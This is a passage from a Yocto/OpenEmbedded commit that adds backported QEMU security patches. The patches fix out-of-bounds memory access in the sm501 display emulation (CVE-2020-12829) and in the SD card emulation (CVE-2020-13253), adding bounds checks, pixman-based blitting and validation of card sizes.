11Message-id: 124bf5de8d7cf503b32b377d0445029a76bfbd49.1590089984.git.balaton@eik.bme.hu
12Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
13
14Upstream-Status: Backport
15CVE: CVE-2020-12829 dep#3
16Signed-off-by: Armin Kuster <akuster@mvista.com>
17
18---
19 hw/display/sm501.c | 5 ++---
20 1 file changed, 2 insertions(+), 3 deletions(-)
21
22diff --git a/hw/display/sm501.c b/hw/display/sm501.c
23index f42d05e1e4..97660090bb 100644
24--- a/hw/display/sm501.c
25+++ b/hw/display/sm501.c
26@@ -701,7 +701,7 @@ static void sm501_2d_operation(SM501State *s)
27 {
28 /* obtain operation parameters */
29 int cmd = (s->twoD_control >> 16) & 0x1F;
30- int rtl = s->twoD_control & 0x8000000;
31+ int rtl = s->twoD_control & BIT(27);
32 int src_x = (s->twoD_source >> 16) & 0x01FFF;
33 int src_y = s->twoD_source & 0xFFFF;
34 int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
35@@ -751,8 +751,7 @@ static void sm501_2d_operation(SM501State *s)
36 }
37 }
38
39- if ((s->twoD_source_base & 0x08000000) ||
40- (s->twoD_destination_base & 0x08000000)) {
41+ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
42 qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
43 return;
44 }
45--
462.25.1
47
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
new file mode 100644
index 0000000000..485af05e1e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
@@ -0,0 +1,100 @@
1From 3d0b096298b5579a7fa0753ad90968b27bc65372 Mon Sep 17 00:00:00 2001
2From: BALATON Zoltan <balaton@eik.bme.hu>
3Date: Thu, 21 May 2020 21:39:44 +0200
4Subject: [PATCH 4/5] sm501: Clean up local variables in sm501_2d_operation
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Make variables local to the block they are used in to make it clearer
10which operation they are needed for.
11
12Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
13Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
14Message-id: ae59f8138afe7f6a5a4a82539d0f61496a906b06.1590089984.git.balaton@eik.bme.hu
15Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
16
17Upstream-Status: Backport
18CVE: CVE-2020-12829 dep#4
19Signed-off-by: Armin Kuster <akuster@mvista.com>
20
21---
22 hw/display/sm501.c | 31 ++++++++++++++++---------------
23 1 file changed, 16 insertions(+), 15 deletions(-)
24
25diff --git a/hw/display/sm501.c b/hw/display/sm501.c
26index 97660090bb..5ed57703d8 100644
27--- a/hw/display/sm501.c
28+++ b/hw/display/sm501.c
29@@ -699,28 +699,19 @@ static inline void hwc_invalidate(SM501State *s, int crt)
30
31 static void sm501_2d_operation(SM501State *s)
32 {
33- /* obtain operation parameters */
34 int cmd = (s->twoD_control >> 16) & 0x1F;
35 int rtl = s->twoD_control & BIT(27);
36- int src_x = (s->twoD_source >> 16) & 0x01FFF;
37- int src_y = s->twoD_source & 0xFFFF;
38- int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
39- int dst_y = s->twoD_destination & 0xFFFF;
40- int width = (s->twoD_dimension >> 16) & 0x1FFF;
41- int height = s->twoD_dimension & 0xFFFF;
42- uint32_t color = s->twoD_foreground;
43 int format = (s->twoD_stretch >> 20) & 0x3;
44 int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
45 /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
46 int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
47 int rop = s->twoD_control & 0xFF;
48- uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
49+ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
50+ int dst_y = s->twoD_destination & 0xFFFF;
51+ int width = (s->twoD_dimension >> 16) & 0x1FFF;
52+ int height = s->twoD_dimension & 0xFFFF;
53 uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
54-
55- /* get frame buffer info */
56- uint8_t *src = s->local_mem + src_base;
57 uint8_t *dst = s->local_mem + dst_base;
58- int src_pitch = s->twoD_pitch & 0x1FFF;
59 int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
60 int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
61 int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
62@@ -758,6 +749,13 @@ static void sm501_2d_operation(SM501State *s)
63
64 switch (cmd) {
65 case 0x00: /* copy area */
66+ {
67+ int src_x = (s->twoD_source >> 16) & 0x01FFF;
68+ int src_y = s->twoD_source & 0xFFFF;
69+ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
70+ uint8_t *src = s->local_mem + src_base;
71+ int src_pitch = s->twoD_pitch & 0x1FFF;
72+
73 #define COPY_AREA(_bpp, _pixel_type, rtl) { \
74 int y, x, index_d, index_s; \
75 for (y = 0; y < height; y++) { \
76@@ -793,8 +791,11 @@ static void sm501_2d_operation(SM501State *s)
77 break;
78 }
79 break;
80-
81+ }
82 case 0x01: /* fill rectangle */
83+ {
84+ uint32_t color = s->twoD_foreground;
85+
86 #define FILL_RECT(_bpp, _pixel_type) { \
87 int y, x; \
88 for (y = 0; y < height; y++) { \
89@@ -819,7 +820,7 @@ static void sm501_2d_operation(SM501State *s)
90 break;
91 }
92 break;
93-
94+ }
95 default:
96 qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
97 cmd);
98--
992.25.1
100
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
new file mode 100644
index 0000000000..ab09e8b039
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
@@ -0,0 +1,266 @@
1From b15a22bbcbe6a78dc3d88fe3134985e4cdd87de4 Mon Sep 17 00:00:00 2001
2From: BALATON Zoltan <balaton@eik.bme.hu>
3Date: Thu, 21 May 2020 21:39:44 +0200
4Subject: [PATCH 5/5] sm501: Replace hand written implementation with pixman
5 where possible
6
7Besides being faster this should also prevent malicious guests to
8abuse 2D engine to overwrite data or cause a crash.
9
10Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
11Message-id: 58666389b6cae256e4e972a32c05cf8aa51bffc0.1590089984.git.balaton@eik.bme.hu
12Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
13
14Upstream-Status: Backport
15CVE: CVE-2020-12829
16Signed-off-by: Armin Kuster <akuster@mvista.com>
17
18---
19 hw/display/sm501.c | 207 ++++++++++++++++++++++++++-------------------
20 1 file changed, 119 insertions(+), 88 deletions(-)
21
22diff --git a/hw/display/sm501.c b/hw/display/sm501.c
23index 5ed57703d8..8bf4d111f4 100644
24--- a/hw/display/sm501.c
25+++ b/hw/display/sm501.c
26@@ -706,13 +706,12 @@ static void sm501_2d_operation(SM501State *s)
27 /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
28 int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
29 int rop = s->twoD_control & 0xFF;
30- int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
31- int dst_y = s->twoD_destination & 0xFFFF;
32- int width = (s->twoD_dimension >> 16) & 0x1FFF;
33- int height = s->twoD_dimension & 0xFFFF;
34+ unsigned int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
35+ unsigned int dst_y = s->twoD_destination & 0xFFFF;
36+ unsigned int width = (s->twoD_dimension >> 16) & 0x1FFF;
37+ unsigned int height = s->twoD_dimension & 0xFFFF;
38 uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
39- uint8_t *dst = s->local_mem + dst_base;
40- int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
41+ unsigned int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
42 int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
43 int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
44
45@@ -721,104 +720,136 @@ static void sm501_2d_operation(SM501State *s)
46 return;
47 }
48
49- if (rop_mode == 0) {
50- if (rop != 0xcc) {
51- /* Anything other than plain copies are not supported */
52- qemu_log_mask(LOG_UNIMP, "sm501: rop3 mode with rop %x is not "
53- "supported.\n", rop);
54- }
55- } else {
56- if (rop2_source_is_pattern && rop != 0x5) {
57- /* For pattern source, we support only inverse dest */
58- qemu_log_mask(LOG_UNIMP, "sm501: rop2 source being the pattern and "
59- "rop %x is not supported.\n", rop);
60- } else {
61- if (rop != 0x5 && rop != 0xc) {
62- /* Anything other than plain copies or inverse dest is not
63- * supported */
64- qemu_log_mask(LOG_UNIMP, "sm501: rop mode %x is not "
65- "supported.\n", rop);
66- }
67- }
68- }
69-
70 if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
71 qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
72 return;
73 }
74
75+ if (!dst_pitch) {
76+ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero dest pitch.\n");
77+ return;
78+ }
79+
80+ if (!width || !height) {
81+ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero size 2D op.\n");
82+ return;
83+ }
84+
85+ if (rtl) {
86+ dst_x -= width - 1;
87+ dst_y -= height - 1;
88+ }
89+
90+ if (dst_base >= get_local_mem_size(s) || dst_base +
91+ (dst_x + width + (dst_y + height) * (dst_pitch + width)) *
92+ (1 << format) >= get_local_mem_size(s)) {
93+ qemu_log_mask(LOG_GUEST_ERROR, "sm501: 2D op dest is outside vram.\n");
94+ return;
95+ }
96+
97 switch (cmd) {
98- case 0x00: /* copy area */
99+ case 0: /* BitBlt */
100 {
101- int src_x = (s->twoD_source >> 16) & 0x01FFF;
102- int src_y = s->twoD_source & 0xFFFF;
103+ unsigned int src_x = (s->twoD_source >> 16) & 0x01FFF;
104+ unsigned int src_y = s->twoD_source & 0xFFFF;
105 uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
106- uint8_t *src = s->local_mem + src_base;
107- int src_pitch = s->twoD_pitch & 0x1FFF;
108-
109-#define COPY_AREA(_bpp, _pixel_type, rtl) { \
110- int y, x, index_d, index_s; \
111- for (y = 0; y < height; y++) { \
112- for (x = 0; x < width; x++) { \
113- _pixel_type val; \
114- \
115- if (rtl) { \
116- index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \
117- index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \
118- } else { \
119- index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \
120- index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
121- } \
122- if (rop_mode == 1 && rop == 5) { \
123- /* Invert dest */ \
124- val = ~*(_pixel_type *)&dst[index_d]; \
125- } else { \
126- val = *(_pixel_type *)&src[index_s]; \
127- } \
128- *(_pixel_type *)&dst[index_d] = val; \
129- } \
130- } \
131- }
132- switch (format) {
133- case 0:
134- COPY_AREA(1, uint8_t, rtl);
135- break;
136- case 1:
137- COPY_AREA(2, uint16_t, rtl);
138- break;
139- case 2:
140- COPY_AREA(4, uint32_t, rtl);
141- break;
142+ unsigned int src_pitch = s->twoD_pitch & 0x1FFF;
143+
144+ if (!src_pitch) {
145+ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero src pitch.\n");
146+ return;
147+ }
148+
149+ if (rtl) {
150+ src_x -= width - 1;
151+ src_y -= height - 1;
152+ }
153+
154+ if (src_base >= get_local_mem_size(s) || src_base +
155+ (src_x + width + (src_y + height) * (src_pitch + width)) *
156+ (1 << format) >= get_local_mem_size(s)) {
157+ qemu_log_mask(LOG_GUEST_ERROR,
158+ "sm501: 2D op src is outside vram.\n");
159+ return;
160+ }
161+
162+ if ((rop_mode && rop == 0x5) || (!rop_mode && rop == 0x55)) {
163+ /* Invert dest, is there a way to do this with pixman? */
164+ unsigned int x, y, i;
165+ uint8_t *d = s->local_mem + dst_base;
166+
167+ for (y = 0; y < height; y++) {
168+ i = (dst_x + (dst_y + y) * dst_pitch) * (1 << format);
169+ for (x = 0; x < width; x++, i += (1 << format)) {
170+ switch (format) {
171+ case 0:
172+ d[i] = ~d[i];
173+ break;
174+ case 1:
175+ *(uint16_t *)&d[i] = ~*(uint16_t *)&d[i];
176+ break;
177+ case 2:
178+ *(uint32_t *)&d[i] = ~*(uint32_t *)&d[i];
179+ break;
180+ }
181+ }
182+ }
183+ } else {
184+ /* Do copy src for unimplemented ops, better than unpainted area */
185+ if ((rop_mode && (rop != 0xc || rop2_source_is_pattern)) ||
186+ (!rop_mode && rop != 0xcc)) {
187+ qemu_log_mask(LOG_UNIMP,
188+ "sm501: rop%d op %x%s not implemented\n",
189+ (rop_mode ? 2 : 3), rop,
190+ (rop2_source_is_pattern ?
191+ " with pattern source" : ""));
192+ }
193+ /* Check for overlaps, this could be made more exact */
194+ uint32_t sb, se, db, de;
195+ sb = src_base + src_x + src_y * (width + src_pitch);
196+ se = sb + width + height * (width + src_pitch);
197+ db = dst_base + dst_x + dst_y * (width + dst_pitch);
198+ de = db + width + height * (width + dst_pitch);
199+ if (rtl && ((db >= sb && db <= se) || (de >= sb && de <= se))) {
200+ /* regions may overlap: copy via temporary */
201+ int llb = width * (1 << format);
202+ int tmp_stride = DIV_ROUND_UP(llb, sizeof(uint32_t));
203+ uint32_t *tmp = g_malloc(tmp_stride * sizeof(uint32_t) *
204+ height);
205+ pixman_blt((uint32_t *)&s->local_mem[src_base], tmp,
206+ src_pitch * (1 << format) / sizeof(uint32_t),
207+ tmp_stride, 8 * (1 << format), 8 * (1 << format),
208+ src_x, src_y, 0, 0, width, height);
209+ pixman_blt(tmp, (uint32_t *)&s->local_mem[dst_base],
210+ tmp_stride,
211+ dst_pitch * (1 << format) / sizeof(uint32_t),
212+ 8 * (1 << format), 8 * (1 << format),
213+ 0, 0, dst_x, dst_y, width, height);
214+ g_free(tmp);
215+ } else {
216+ pixman_blt((uint32_t *)&s->local_mem[src_base],
217+ (uint32_t *)&s->local_mem[dst_base],
218+ src_pitch * (1 << format) / sizeof(uint32_t),
219+ dst_pitch * (1 << format) / sizeof(uint32_t),
220+ 8 * (1 << format), 8 * (1 << format),
221+ src_x, src_y, dst_x, dst_y, width, height);
222+ }
223 }
224 break;
225 }
226- case 0x01: /* fill rectangle */
227+ case 1: /* Rectangle Fill */
228 {
229 uint32_t color = s->twoD_foreground;
230
231-#define FILL_RECT(_bpp, _pixel_type) { \
232- int y, x; \
233- for (y = 0; y < height; y++) { \
234- for (x = 0; x < width; x++) { \
235- int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
236- *(_pixel_type *)&dst[index] = (_pixel_type)color; \
237- } \
238- } \
239- }
240-
241- switch (format) {
242- case 0:
243- FILL_RECT(1, uint8_t);
244- break;
245- case 1:
246- color = cpu_to_le16(color);
247- FILL_RECT(2, uint16_t);
248- break;
249- case 2:
250+ if (format == 2) {
251 color = cpu_to_le32(color);
252- FILL_RECT(4, uint32_t);
253- break;
254+ } else if (format == 1) {
255+ color = cpu_to_le16(color);
256 }
257+
258+ pixman_fill((uint32_t *)&s->local_mem[dst_base],
259+ dst_pitch * (1 << format) / sizeof(uint32_t),
260+ 8 * (1 << format), dst_x, dst_y, width, height, color);
261 break;
262 }
263 default:
264--
2652.25.1
266
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
new file mode 100644
index 0000000000..7f8383987c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
@@ -0,0 +1,50 @@
1From 6dd3a164f5b31c703c7d8372841ad3bd6a57de6d Mon Sep 17 00:00:00 2001
2From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
3Date: Tue, 5 Jun 2018 22:28:51 -0300
4Subject: [PATCH 1/1] hw/sd/sdcard: Simplify realize() a bit
5MIME-Version: 1.0
6Content-Type: text/plain; charset=utf8
7Content-Transfer-Encoding: 8bit
8
9We don't need to check if sd->blk is set twice.
10
11Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
12Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
13Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
14Message-Id: <20200630133912.9428-18-f4bug@amsat.org>
15
16Upstram-Status: Backport:
17https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=6dd3a164f5b31c703c7d8372841ad3bd6a57de6d
18
19CVE: CVE-2020-13253
20
21Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
22---
23 hw/sd/sd.c | 10 +++++-----
24 1 file changed, 5 insertions(+), 5 deletions(-)
25
26diff --git a/hw/sd/sd.c b/hw/sd/sd.c
27index 1cc16bf..edd60a0 100644
28--- a/hw/sd/sd.c
29+++ b/hw/sd/sd.c
30@@ -2105,12 +2105,12 @@ static void sd_realize(DeviceState *dev, Error **errp)
31 return;
32 }
33
34- if (sd->blk && blk_is_read_only(sd->blk)) {
35- error_setg(errp, "Cannot use read-only drive as SD card");
36- return;
37- }
38-
39 if (sd->blk) {
40+ if (blk_is_read_only(sd->blk)) {
41+ error_setg(errp, "Cannot use read-only drive as SD card");
42+ return;
43+ }
44+
45 ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
46 BLK_PERM_ALL, errp);
47 if (ret < 0) {
48--
491.8.3.1
50
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
new file mode 100644
index 0000000000..53145d059f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
@@ -0,0 +1,112 @@
1From a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
3Date: Tue, 7 Jul 2020 13:02:34 +0200
4Subject: [PATCH] hw/sd/sdcard: Do not allow invalid SD card sizes
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9QEMU allows to create SD card with unrealistic sizes. This could
10work, but some guests (at least Linux) consider sizes that are not
11a power of 2 as a firmware bug and fix the card size to the next
12power of 2.
13
14While the possibility to use small SD card images has been seen as
15a feature, it became a bug with CVE-2020-13253, where the guest is
16able to do OOB read/write accesses past the image size end.
17
18In a pair of commits we will fix CVE-2020-13253 as:
19
20 Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
21 occurred and no data transfer is performed.
22
23 Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
24 occurred and no data transfer is performed.
25
26 WP_VIOLATION errors are not modified: the error bit is set, we
27 stay in receive-data state, wait for a stop command. All further
28 data transfer is ignored. See the check on sd->card_status at the
29 beginning of sd_read_data() and sd_write_data().
30
31While this is the correct behavior, in case QEMU create smaller SD
32cards, guests still try to access past the image size end, and QEMU
33considers this is an invalid address, thus "all further data transfer
34is ignored". This is wrong and make the guest looping until
35eventually timeouts.
36
37Fix by not allowing invalid SD card sizes (suggesting the expected
38size as a hint):
39
40 $ qemu-system-arm -M orangepi-pc -drive file=rootfs.ext2,if=sd,format=raw
41 qemu-system-arm: Invalid SD card size: 60 MiB
42 SD card size has to be a power of 2, e.g. 64 MiB.
43 You can resize disk images with 'qemu-img resize <imagefile> <new-size>'
44 (note that this will lose data if you make the image smaller than it currently is).
45
46Cc: qemu-stable@nongnu.org
47Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
48Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
49Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
50Message-Id: <20200713183209.26308-8-f4bug@amsat.org>
51
52Upstram-Status: Backport:
53https://git.qemu.org/?p=qemu.git;a=commit;h=a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36
54
55CVE: CVE-2020-13253
56
57Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
58---
59 hw/sd/sd.c | 25 +++++++++++++++++++++++++
60 1 file changed, 25 insertions(+)
61
62diff --git a/hw/sd/sd.c b/hw/sd/sd.c
63index edd60a09c0..76d68359a4 100644
64--- a/hw/sd/sd.c
65+++ b/hw/sd/sd.c
66@@ -32,6 +32,7 @@
67
68 #include "qemu/osdep.h"
69 #include "qemu/units.h"
70+#include "qemu/cutils.h"
71 #include "hw/irq.h"
72 #include "hw/registerfields.h"
73 #include "sysemu/block-backend.h"
74@@ -2106,11 +2107,35 @@ static void sd_realize(DeviceState *dev, Error **errp)
75 }
76
77 if (sd->blk) {
78+ int64_t blk_size;
79+
80 if (blk_is_read_only(sd->blk)) {
81 error_setg(errp, "Cannot use read-only drive as SD card");
82 return;
83 }
84
85+ blk_size = blk_getlength(sd->blk);
86+ if (blk_size > 0 && !is_power_of_2(blk_size)) {
87+ int64_t blk_size_aligned = pow2ceil(blk_size);
88+ char *blk_size_str;
89+
90+ blk_size_str = size_to_str(blk_size);
91+ error_setg(errp, "Invalid SD card size: %s", blk_size_str);
92+ g_free(blk_size_str);
93+
94+ blk_size_str = size_to_str(blk_size_aligned);
95+ error_append_hint(errp,
96+ "SD card size has to be a power of 2, e.g. %s.\n"
97+ "You can resize disk images with"
98+ " 'qemu-img resize <imagefile> <new-size>'\n"
99+ "(note that this will lose data if you make the"
100+ " image smaller than it currently is).\n",
101+ blk_size_str);
102+ g_free(blk_size_str);
103+
104+ return;
105+ }
106+
107 ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
108 BLK_PERM_ALL, errp);
109 if (ret < 0) {
110--
1112.32.0
112
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
new file mode 100644
index 0000000000..b512b2bd7f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
@@ -0,0 +1,86 @@
1From 794d68de2f021a6d3874df41d6bbe8590ec05207 Mon Sep 17 00:00:00 2001
2From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
3Date: Mon, 13 Jul 2020 09:27:35 +0200
4Subject: [PATCH] hw/sd/sdcard: Update coding style to make checkpatch.pl happy
5MIME-Version: 1.0
6Content-Type: text/plain; charset=utf8
7Content-Transfer-Encoding: 8bit
8
9To make the next commit easier to review, clean this code first.
10
11Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
12Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
13Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
14Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
15Message-Id: <20200630133912.9428-3-f4bug@amsat.org>
16
17Upstram-Status: Backport:
18https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=794d68de2f021a6d3874df41d6bbe8590ec05207
19
20CVE: CVE-2020-13253
21
22Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
23---
24diff --git a/hw/sd/sd.c b/hw/sd/sd.c
25--- a/hw/sd/sd.c (revision b0ca999a43a22b38158a222233d3f5881648bb4f)
26+++ b/hw/sd/sd.c (date 1647514442924)
27@@ -1154,8 +1154,9 @@
28 sd->data_start = addr;
29 sd->data_offset = 0;
30
31- if (sd->data_start + sd->blk_len > sd->size)
32+ if (sd->data_start + sd->blk_len > sd->size) {
33 sd->card_status |= ADDRESS_ERROR;
34+ }
35 return sd_r1;
36
37 default:
38@@ -1170,8 +1171,9 @@
39 sd->data_start = addr;
40 sd->data_offset = 0;
41
42- if (sd->data_start + sd->blk_len > sd->size)
43+ if (sd->data_start + sd->blk_len > sd->size) {
44 sd->card_status |= ADDRESS_ERROR;
45+ }
46 return sd_r1;
47
48 default:
49@@ -1216,12 +1218,15 @@
50 sd->data_offset = 0;
51 sd->blk_written = 0;
52
53- if (sd->data_start + sd->blk_len > sd->size)
54+ if (sd->data_start + sd->blk_len > sd->size) {
55 sd->card_status |= ADDRESS_ERROR;
56- if (sd_wp_addr(sd, sd->data_start))
57+ }
58+ if (sd_wp_addr(sd, sd->data_start)) {
59 sd->card_status |= WP_VIOLATION;
60- if (sd->csd[14] & 0x30)
61+ }
62+ if (sd->csd[14] & 0x30) {
63 sd->card_status |= WP_VIOLATION;
64+ }
65 return sd_r1;
66
67 default:
68@@ -1240,12 +1245,15 @@
69 sd->data_offset = 0;
70 sd->blk_written = 0;
71
72- if (sd->data_start + sd->blk_len > sd->size)
73+ if (sd->data_start + sd->blk_len > sd->size) {
74 sd->card_status |= ADDRESS_ERROR;
75- if (sd_wp_addr(sd, sd->data_start))
76+ }
77+ if (sd_wp_addr(sd, sd->data_start)) {
78 sd->card_status |= WP_VIOLATION;
79- if (sd->csd[14] & 0x30)
80+ }
81+ if (sd->csd[14] & 0x30) {
82 sd->card_status |= WP_VIOLATION;
83+ }
84 return sd_r1;
85
86 default:
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
new file mode 100644
index 0000000000..6b4c1ec050
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
@@ -0,0 +1,139 @@
1From 790762e5487114341cccc5bffcec4cb3c022c3cd Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
3Date: Thu, 4 Jun 2020 19:22:29 +0200
4Subject: [PATCH] hw/sd/sdcard: Do not switch to ReceivingData if address is
5 invalid
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Only move the state machine to ReceivingData if there is no
11pending error. This avoids later OOB access while processing
12commands queued.
13
14 "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
15
16 4.3.3 Data Read
17
18 Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
19 occurred and no data transfer is performed.
20
21 4.3.4 Data Write
22
23 Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
24 occurred and no data transfer is performed.
25
26WP_VIOLATION errors are not modified: the error bit is set, we
27stay in receive-data state, wait for a stop command. All further
28data transfer is ignored. See the check on sd->card_status at the
29beginning of sd_read_data() and sd_write_data().
30
31Fixes: CVE-2020-13253
32
33Cc: qemu-stable@nongnu.org
34Reported-by: Alexander Bulekov <alxndr@bu.edu>
35Buglink: https://bugs.launchpad.net/qemu/+bug/1880822
36Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
37Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
38Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
39Message-Id: <20200630133912.9428-6-f4bug@amsat.org>
40
41Upstram-Status: Backport:
42https://git.qemu.org/?p=qemu.git;a=commit;h=790762e5487114341cccc5bffcec4cb3c022c3cd
43
44CVE: CVE-2020-13253
45
46Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
47---
48 hw/sd/sd.c | 38 ++++++++++++++++++++++++--------------
49 1 file changed, 24 insertions(+), 14 deletions(-)
50
51diff --git a/hw/sd/sd.c b/hw/sd/sd.c
52index f4f76f8fd2..fad9cf1ee7 100644
53--- a/hw/sd/sd.c
54+++ b/hw/sd/sd.c
55@@ -1171,13 +1171,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
56 case 17: /* CMD17: READ_SINGLE_BLOCK */
57 switch (sd->state) {
58 case sd_transfer_state:
59- sd->state = sd_sendingdata_state;
60- sd->data_start = addr;
61- sd->data_offset = 0;
62
63- if (sd->data_start + sd->blk_len > sd->size) {
64+ if (addr + sd->blk_len > sd->size) {
65 sd->card_status |= ADDRESS_ERROR;
66+ return sd_r1;
67 }
68+
69+ sd->state = sd_sendingdata_state;
70+ sd->data_start = addr;
71+ sd->data_offset = 0;
72 return sd_r1;
73
74 default:
75@@ -1188,13 +1190,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
76 case 18: /* CMD18: READ_MULTIPLE_BLOCK */
77 switch (sd->state) {
78 case sd_transfer_state:
79- sd->state = sd_sendingdata_state;
80- sd->data_start = addr;
81- sd->data_offset = 0;
82
83- if (sd->data_start + sd->blk_len > sd->size) {
84+ if (addr + sd->blk_len > sd->size) {
85 sd->card_status |= ADDRESS_ERROR;
86+ return sd_r1;
87 }
88+
89+ sd->state = sd_sendingdata_state;
90+ sd->data_start = addr;
91+ sd->data_offset = 0;
92 return sd_r1;
93
94 default:
95@@ -1234,14 +1238,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
96 /* Writing in SPI mode not implemented. */
97 if (sd->spi)
98 break;
99+
100+ if (addr + sd->blk_len > sd->size) {
101+ sd->card_status |= ADDRESS_ERROR;
102+ return sd_r1;
103+ }
104+
105 sd->state = sd_receivingdata_state;
106 sd->data_start = addr;
107 sd->data_offset = 0;
108 sd->blk_written = 0;
109
110- if (sd->data_start + sd->blk_len > sd->size) {
111- sd->card_status |= ADDRESS_ERROR;
112- }
113 if (sd_wp_addr(sd, sd->data_start)) {
114 sd->card_status |= WP_VIOLATION;
115 }
116@@ -1261,14 +1268,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
